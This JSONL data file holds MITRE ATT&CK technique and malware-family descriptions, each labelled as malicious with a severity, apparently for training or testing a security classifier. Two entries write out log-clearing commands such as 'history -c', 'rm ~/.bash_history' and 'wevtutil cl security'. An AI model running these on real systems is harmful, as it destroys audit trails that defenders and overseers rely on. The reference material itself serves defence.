{"id": "mitre_00124", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# External Defacement\n\nTechnique: T1491.002\nTactics: impact\nPlatforms: Windows, IaaS, Linux, macOS\n\nAn adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system\u2019s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1491.002", "technique_name": "External Defacement", "tactics": ["impact"]}}]}
{"id": "mitre_00125", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# KONNI\n\nType: malware\nPlatforms: Windows\n\n[KONNI](https://attack.mitre.org/software/S0356) is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Talos Konni May 2017)(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "KONNI", "malware_type": "malware"}}]}
{"id": "mitre_00126", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Scripting\n\nTechnique: T1064\nTactics: defense-evasion, execution\nPlatforms: Linux, macOS, Windows\n\n**This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.**\n\nAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1064", "technique_name": "Scripting", "tactics": ["defense-evasion", "execution"]}}]}
{"id": "mitre_00127", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# MgBot\n\nType: malware\nPlatforms: Windows\n\n[MgBot](https://attack.mitre.org/software/S1146) is a modular malware framework exclusively associated with [Daggerfly](https://attack.mitre.org/groups/G1034) operations since at least 2012. [MgBot](https://attack.mitre.org/software/S1146) was developed in C++ and features a module design with multiple available plugins that have been under active development through 2024.(Citation: Szappanos MgBot 2014)(Citation: ESET EvasivePanda 2023)(Citation: Symantec Daggerfly 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "MgBot", "malware_type": "malware"}}]}
{"id": "mitre_00128", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Web Services\n\nTechnique: T1584.006\nTactics: resource-development\nPlatforms: PRE\n\nAdversaries may compromise access to third-party web services\u00a0that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1584.006", "technique_name": "Web Services", "tactics": ["resource-development"]}}]}
{"id": "mitre_00129", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Steal or Forge Authentication Certificates\n\nTechnique: T1649\nTactics: credential-access\nPlatforms: Windows, Linux, macOS, Identity Provider\n\nAdversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)\n\nAuthentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate\u2019s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate\u2019s subject alternative name (SAN) values define the certificate owner\u2019s alternate names.(Citation: Medium Certified Pre Owned)\n\nAbusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.\n\nAdversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as \u201cgolden\u201d certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1649", "technique_name": "Steal or Forge Authentication Certificates", "tactics": ["credential-access"]}}]}
{"id": "mitre_00130", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Revert Cloud Instance\n\nTechnique: T1578.004\nTactics: defense-evasion\nPlatforms: IaaS\n\nAn adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1578.004", "technique_name": "Revert Cloud Instance", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00131", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Stored Data Manipulation\n\nTechnique: T1565.001\nTactics: impact\nPlatforms: Linux, macOS, Windows\n\nAdversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1565.001", "technique_name": "Stored Data Manipulation", "tactics": ["impact"]}}]}
{"id": "mitre_00132", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# GoBear\n\nType: malware\nPlatforms: Windows\n\n[GoBear](https://attack.mitre.org/software/S1197) is a Go-based backdoor that abuses legitimate, stolen certificates for defense evasion purposes. [GoBear](https://attack.mitre.org/software/S1197) is exclusively linked to [Kimsuky](https://attack.mitre.org/groups/G0094) operations.(Citation: S2W Troll Stealer 2024)(Citation: Symantec Troll Stealer 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "GoBear", "malware_type": "malware"}}]}
{"id": "mitre_00133", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# China Chopper\n\nType: malware\nPlatforms: Windows\n\n[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server.(Citation: Lee 2013) It has been used by several threat groups.(Citation: Dell TG-3390)(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Rapid7 HAFNIUM Mar 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "China Chopper", "malware_type": "malware"}}]}
{"id": "mitre_00134", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Application Exhaustion Flood\n\nTechnique: T1499.003\nTactics: impact\nPlatforms: Windows, IaaS, Linux, macOS\n\nAdversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1499.003", "technique_name": "Application Exhaustion Flood", "tactics": ["impact"]}}]}
{"id": "mitre_00135", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# DOGCALL\n\nType: malware\nPlatforms: Windows\n\n[DOGCALL](https://attack.mitre.org/software/S0213) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. (Citation: FireEye APT37 Feb 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "DOGCALL", "malware_type": "malware"}}]}
{"id": "mitre_00136", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Sardonic\n\nType: malware\nPlatforms: Windows\n\n[Sardonic](https://attack.mitre.org/software/S1085) is a backdoor written in C and C++ that is known to be used by [FIN8](https://attack.mitre.org/groups/G0061), as early as August 2021 to target a financial institution in the United States. [Sardonic](https://attack.mitre.org/software/S1085) has a plugin system that can load specially made DLLs and execute their functions.(Citation: Bitdefender Sardonic Aug 2021)(Citation: Symantec FIN8 Jul 2023)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Sardonic", "malware_type": "malware"}}]}
{"id": "mitre_00137", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Proxysvc\n\nType: malware\nPlatforms: Windows\n\n[Proxysvc](https://attack.mitre.org/software/S0238) is a malicious DLL used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of [Proxysvc](https://attack.mitre.org/software/S0238) is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. (Citation: McAfee GhostSecret)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Proxysvc", "malware_type": "malware"}}]}
{"id": "mitre_00138", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Cuba\n\nType: malware\nPlatforms: Windows\n\n\n[Cuba](https://attack.mitre.org/software/S0625) is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.(Citation: McAfee Cuba April 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Cuba", "malware_type": "malware"}}]}
{"id": "mitre_00139", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Clear Command History\n\nTechnique: T1070.003\nTactics: defense-evasion\nPlatforms: ESXi, Linux, macOS, Network Devices, Windows\n\nIn addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\n\nOn Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history. \n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (clear logging and/or clear history).(Citation: US-CERT-TA18-106A) On ESXi servers, command history may be manually removed from the `/var/log/shell.log` file.(Citation: Broadcom ESXi Shell Audit)\n\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\n\nThe PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)\n\nAdversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1070.003", "technique_name": "Clear Command History", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00140", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Peripheral Device Discovery\n\nTechnique: T1120\nTactics: discovery\nPlatforms: Linux, Windows, macOS\n\nAdversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1120", "technique_name": "Peripheral Device Discovery", "tactics": ["discovery"]}}]}
{"id": "mitre_00141", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# EvilGrab\n\nType: malware\nPlatforms: Windows\n\n[EvilGrab](https://attack.mitre.org/software/S0152) is a malware family with common reconnaissance capabilities. It has been deployed by [menuPass](https://attack.mitre.org/groups/G0045) via malicious Microsoft Office documents as part of spearphishing campaigns. (Citation: PWC Cloud Hopper Technical Annex April 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "EvilGrab", "malware_type": "malware"}}]}
{"id": "mitre_00142", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Cadelspy\n\nType: malware\nPlatforms: Windows\n\n[Cadelspy](https://attack.mitre.org/software/S0454) is a backdoor that has been used by [APT39](https://attack.mitre.org/groups/G0087).(Citation: Symantec Chafer Dec 2015)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Cadelspy", "malware_type": "malware"}}]}
{"id": "mitre_00143", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# RC Scripts\n\nTechnique: T1037.004\nTactics: persistence, privilege-escalation\nPlatforms: macOS, Linux, Network Devices, ESXi\n\nAdversaries may establish persistence by modifying RC scripts, which are executed during a Unix-like system\u2019s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.\n\nAdversaries may establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.\n\nAdversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as ESXi hypervisors, IoT, or embedded systems.(Citation: intezer-kaiji-malware) As ESXi servers store most system files in memory and therefore discard changes on shutdown, leveraging `/etc/rc.local.d/local.sh` is one of the few mechanisms for enabling persistence across reboots.(Citation: Juniper Networks ESXi Backdoor 2022)\n\nSeveral Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of Launchd.(Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1037.004", "technique_name": "RC Scripts", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00144", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Software Discovery\n\nTechnique: T1518\nTactics: discovery\nPlatforms: ESXi, IaaS, Linux, macOS, Windows\n\nAdversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nSuch software may be deployed widely across the environment for configuration management or security reasons, such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072), and may allow adversaries broad access to infect devices or move laterally.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1518", "technique_name": "Software Discovery", "tactics": ["discovery"]}}]}
{"id": "mitre_00145", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# KGH_SPY\n\nType: malware\nPlatforms: Windows\n\n[KGH_SPY](https://attack.mitre.org/software/S0526) is a modular suite of tools used by [Kimsuky](https://attack.mitre.org/groups/G0094) for reconnaissance, information stealing, and backdoor capabilities. [KGH_SPY](https://attack.mitre.org/software/S0526) derived its name from PDB paths and internal names found in samples containing \"KGH\".(Citation: Cybereason Kimsuky November 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "KGH_SPY", "malware_type": "malware"}}]}
{"id": "mitre_00146", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Command and Scripting Interpreter\n\nTechnique: T1059\nTactics: execution\nPlatforms: ESXi, IaaS, Identity Provider, Linux, macOS, Network Devices, Office Suite, Windows\n\nAdversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nThere are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1059", "technique_name": "Command and Scripting Interpreter", "tactics": ["execution"]}}]}
{"id": "mitre_00147", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Clear Windows Event Logs\n\nTechnique: T1070.001\nTactics: defense-evasion\nPlatforms: Windows\n\nAdversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\n\nWith administrator privileges, the event logs can be cleared with the following utility commands:\n\n* wevtutil cl system\n* wevtutil cl application\n* wevtutil cl security\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command Remove-EventLog -LogName Security to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)\n\nAdversaries may also attempt to clear logs by directly deleting the stored log files within `C:\\Windows\\System32\\winevt\\logs\\`.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1070.001", "technique_name": "Clear Windows Event Logs", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00148", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Line Runner\n\nType: malware\nPlatforms: Network Devices\n\n[Line Runner](https://attack.mitre.org/software/S1188) is a persistent backdoor and web shell allowing threat actors to upload and execute arbitrary Lua scripts. [Line Runner](https://attack.mitre.org/software/S1188) is associated with the [ArcaneDoor](https://attack.mitre.org/campaigns/C0046) campaign.(Citation: CCCS ArcaneDoor 2024)(Citation: Cisco ArcaneDoor 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Line Runner", "malware_type": "malware"}}]}
{"id": "mitre_00149", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Search Open Websites/Domains\n\nTechnique: T1593\nTactics: reconnaissance\nPlatforms: PRE\n\nAdversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1593", "technique_name": "Search Open Websites/Domains", "tactics": ["reconnaissance"]}}]}
{"id": "mitre_00150", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# DCSrv\n\nType: malware\nPlatforms: Windows\n\n[DCSrv](https://attack.mitre.org/software/S1033) is destructive malware that has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) since at least September 2021. Though [DCSrv](https://attack.mitre.org/software/S1033) has ransomware-like capabilities, [Moses Staff](https://attack.mitre.org/groups/G1009) does not demand ransom or offer a decryption key.(Citation: Checkpoint MosesStaff Nov 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "DCSrv", "malware_type": "malware"}}]}
{"id": "mitre_00151", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Impacket\n\nType: tool\nPlatforms: Linux, macOS, Windows\n\n[Impacket](https://attack.mitre.org/software/S0357) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://attack.mitre.org/software/S0357) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.(Citation: Impacket Tools)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Impacket", "malware_type": "tool"}}]}
{"id": "mitre_00152", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# PITSTOP\n\nType: malware\nPlatforms: Network Devices\n\n[PITSTOP](https://attack.mitre.org/software/S1123) is a backdoor that was deployed on compromised Ivanti Connect Secure VPNs during [Cutting Edge](https://attack.mitre.org/campaigns/C0029) to enable command execution and file read/write.(Citation: Mandiant Cutting Edge Part 3 February 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "PITSTOP", "malware_type": "malware"}}]}
{"id": "mitre_00153", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Spearphishing via Service\n\nTechnique: T1566.003\nTactics: initial-access\nPlatforms: Linux, macOS, Windows\n\nAdversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: Lookout Dark Caracal Jan 2018) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1566.003", "technique_name": "Spearphishing via Service", "tactics": ["initial-access"]}}]}
{"id": "mitre_00154", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Service Exhaustion Flood\n\nTechnique: T1499.002\nTactics: impact\nPlatforms: Windows, IaaS, Linux, macOS\n\nAdversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.\n\nOne example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)\n\nAnother variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1499.002", "technique_name": "Service Exhaustion Flood", "tactics": ["impact"]}}]}
